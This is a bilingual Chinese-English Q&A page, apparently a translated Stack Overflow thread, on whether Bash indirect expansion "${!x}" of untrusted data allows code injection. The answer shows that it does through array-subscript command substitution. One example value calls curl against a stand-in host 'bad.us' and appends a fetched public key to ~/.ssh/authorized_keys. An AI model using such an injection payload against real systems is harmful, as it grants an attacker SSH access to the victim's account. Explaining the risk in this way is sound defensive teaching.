"$ {!x}"的安全注意事项Bash的间接扩展 [英] Safety considerations for "${!x}" indirect expansion in Bash
问题描述
假设 x
有一个变量,它包含未知的任意数据.
Suppose I have a variable, says x
, that contains unknown, arbitrary data.
以下间接扩展是否有注入代码或其他形式的利用漏洞的风险?
Is the following indirect expansion at risk of code injection or other forms of exploits?
ARBITRARY_COMMAND "${!x}"
我知道在某些情况下,为有用的现实情况分配 x
的方式本身可能会带来风险,需要进行适当的控制或消毒,但是我在这里假设x
的初始化方式无法保证其价值,但在上述扩展之前并未受到攻击.
I know there are cases where the way x
is assigned for useful real-life scenarios may by itself introduce risks and need to be properly controlled or sanitized, but I am assuming here that x
has been initialized in a a way that makes no guarantee as to its value, yet is not exposed to exploits up to the expansion shown above.
推荐答案
简而言之:是的,对未知数据的任何自动扩展都是潜在的危险.
In short: YES, any automatic expansion of unknown data is potentially hazardous.
gniourf_gniourf 的答案:
x ='a [$(ls>& 2)]'
在扩展 $ {!x}
时,Bash会扩展 $ {a [$(ls>& 2)]}
,这是一个数组扩展,因此数组键中的术语 $(ls>& 2)
,将被扩展...并将执行 ls
(输出到stderr,因此我们都可以观察到ls确实已执行).
when expanding ${!x}
, Bash will expand ${a[$(ls>&2)]}
, which is an
array expansion, so the term inside the array key, namely $(ls>&2)
,
will be expanded... and this will execute ls
(with output to stderr so
that we can all observe that ls is indeed executed).
例如,您可以代替 ls
:
x='a[$(curl -s bad.us/pubkey >> ~/.ssh/authorized_keys)]'
由 $ {!x}
进行评估时,会将一个可能不友好的公钥附加到您的authorized_keys文件中,这可能使不友好的人进入您的帐户.
Which when evaluated by ${!x}
would append a potentially unfriendly public key to your authorized_keys file, which could allow an unfriendly person to ssh into your account.
这篇关于"$ {!x}"的安全注意事项Bash的间接扩展的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!